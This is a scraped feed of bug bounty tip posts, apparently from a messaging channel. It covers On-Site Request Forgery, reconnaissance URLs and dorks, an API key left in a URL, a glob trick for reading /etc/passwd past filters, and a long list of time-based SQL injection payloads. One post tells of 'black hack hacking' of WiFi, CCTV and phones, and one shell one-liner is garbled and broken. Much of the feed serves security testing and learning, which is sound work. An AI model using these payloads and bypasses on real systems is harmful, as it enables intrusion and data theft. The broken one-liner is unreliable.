Live Bug Bounty Hunting: The Ultimate Checklist to Level Up Your Skills | Bugcrowd | part-(1)
https://youtu.be/2nYDs_yDCXI?si=mjZRs5eNVIUhs0tO
https://youtu.be/2nYDs_yDCXI?si=mjZRs5eNVIUhs0tO
❤11👍5🔥3
🔖 On-Site Request Forgery (OSRF): An Overview
🚨On-Site Request Forgery (OSRF) is a lesser-known but impactful vulnerability similar to Cross-Site Request Forgery (CSRF). While both involve unauthorized actions performed on behalf of an authenticated user, the fundamental distinction lies in the request origin.
- CSRF: The attacker initiates requests from their controlled domain to exploit a victim's authenticated session.
- OSRF: The requests originate from the vulnerable application itself, and the attacker controls where the requests are directed.
---
🔍 Where to Find OSRF Vulnerabilities
1. Reflected Inputs in
Look for inputs that can be reflected in attributes like
👉 If the input can be manipulated, it may allow the attacker to direct requests to their desired endpoints.
2. Sensitive Endpoints Using the GET Method
Endpoints performing sensitive actions with GET requests are prime targets for OSRF. For example:
If such endpoints exist and can be controlled via reflected input, they may be exploited for OSRF.
⚠️ Best Practices for Prevention
1. Avoid GET Methods for Sensitive Actions
Use POST methods for actions involving sensitive changes, as they require more intentional execution.
2. Validate and Sanitize Inputs
Ensure all user inputs, especially those reflected in attributes like
3. Implement Content Security Policies (CSP)
CSPs can limit where resources like images or iframes can be loaded from, reducing the risk of external request manipulation.
4. Monitor and Audit Application Behavior
Regularly test your application for unusual or unintended request behaviors to identify vulnerabilities early.
This additional layer of security awareness helps ensure OSRF vulnerabilities are addressed alongside CSRF for a more robust application defense.
Learn More: https://github.com/daffainfo/AllAboutBugBounty/blob/master/On%20Site%20Request%20Forgery.md
🚨On-Site Request Forgery (OSRF) is a lesser-known but impactful vulnerability similar to Cross-Site Request Forgery (CSRF). While both involve unauthorized actions performed on behalf of an authenticated user, the fundamental distinction lies in the request origin.
- CSRF: The attacker initiates requests from their controlled domain to exploit a victim's authenticated session.
- OSRF: The requests originate from the vulnerable application itself, and the attacker controls where the requests are directed.
---
🔍 Where to Find OSRF Vulnerabilities
1. Reflected Inputs in
src Attributes Look for inputs that can be reflected in attributes like
src. Example vulnerable tags: html
<img src="OUR_INPUT_HERE">
<video width="400" height="200" controls src="OUR_INPUT_HERE">
<audio src="OUR_INPUT_HERE">
<iframe src="OUR_INPUT_HERE">
👉 If the input can be manipulated, it may allow the attacker to direct requests to their desired endpoints.
2. Sensitive Endpoints Using the GET Method
Endpoints performing sensitive actions with GET requests are prime targets for OSRF. For example:
GET /settings.php?remove_account=1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
If such endpoints exist and can be controlled via reflected input, they may be exploited for OSRF.
⚠️ Best Practices for Prevention
1. Avoid GET Methods for Sensitive Actions
Use POST methods for actions involving sensitive changes, as they require more intentional execution.
2. Validate and Sanitize Inputs
Ensure all user inputs, especially those reflected in attributes like
src, are properly validated and sanitized. 3. Implement Content Security Policies (CSP)
CSPs can limit where resources like images or iframes can be loaded from, reducing the risk of external request manipulation.
4. Monitor and Audit Application Behavior
Regularly test your application for unusual or unintended request behaviors to identify vulnerabilities early.
This additional layer of security awareness helps ensure OSRF vulnerabilities are addressed alongside CSRF for a more robust application defense.
Learn More: https://github.com/daffainfo/AllAboutBugBounty/blob/master/On%20Site%20Request%20Forgery.md
GitHub
AllAboutBugBounty/On Site Request Forgery.md at master · daffainfo/AllAboutBugBounty
All about bug bounty (bypasses, payloads, and etc) - daffainfo/AllAboutBugBounty
❤15👍6
subdomainRecon.txt
3.1 KB
I have given this file because many of my subscribers requested it. However, I would like to make one request to you, that is, share my YouTube channel and Telegram channel more.
👍37❤🔥15❤11🔥5🥰2
💻 All About Bug Bounty - Updated!
🔥https://github.com/daffainfo/AllAboutBugBounty
#BugBounty #bugbountytips
🔥https://github.com/daffainfo/AllAboutBugBounty
#BugBounty #bugbountytips
👍19🔥5❤🔥2❤2🥰1🗿1
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
https://www.virustotal.com/vtapi/v2/domain/report?apikey=982680b1787fa59701919aa22515a025e00df1e3bb2bc4f186b8e919558d576c&domain=example.com
https://otx.alienvault.com/api/v1/indicators/hostname/domain.com/url_list?limit=500&page=1
curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
❤22💩18👍7🔥4🍌2
Well, many of you will notice that I have not been posting any videos lately. This is because I have been recharging with black hack hacking for some time now. I am recharging with many things like WiFi hacking 📡as many ways as possible and Bluetooth hacking🚦 and CCTV camera hacking📸 mobile hacking📱 and many more things that I will use in my real life. But if I feel that I need to bring a video or course on this topic, then I will definitely bring it and let you know my opinion.
❤48🖕9👍6❤🔥5
☄️Information Disclosure Dork☄️
site:*.example.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)🔥24❤5👎3
A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.
Use shell globbing / wildcard expansion. Here is an example
Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.
#bugbountytips #hacking
Use shell globbing / wildcard expansion. Here is an example
cat /e*c/p*s*d is equivalent to cat /etc/passwd. But how? Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.
/e*c: The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."/p*s*d: This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d#bugbountytips #hacking
🔥24❤6👍3🤡3❤🔥2
timebased payloads for different dbms:
XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='
👍26❤14🔥10💩5🖕4
☄️IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.
🛍https://github.com/errorfiathck/IDOR-Forge
🛍https://github.com/errorfiathck/IDOR-Forge
❤25👍7💩2🖕2👏1👾1
waybackurls HOSTS | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?
15*[=: 1\5*[ '\"]?[^'\"]+.js[^'|"> ]*" | awk -F '/'
'{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh
-c "curl -k -s \"%)" | sed \"s/[;}\)>]/\n/g\" | grep -Po \" (L'1|\"](https?: )?[/1{1,2}[^'||l"> 1{5,3)|(\.
(get|post|ajax|load)\s*\(\5*['||\"](https?:)?[/1{1,2}[^'||\"> ]
{5,})\"" | awk -F "['|"]" '{print $2}' sort -fu
❤33🔥11👍7👎1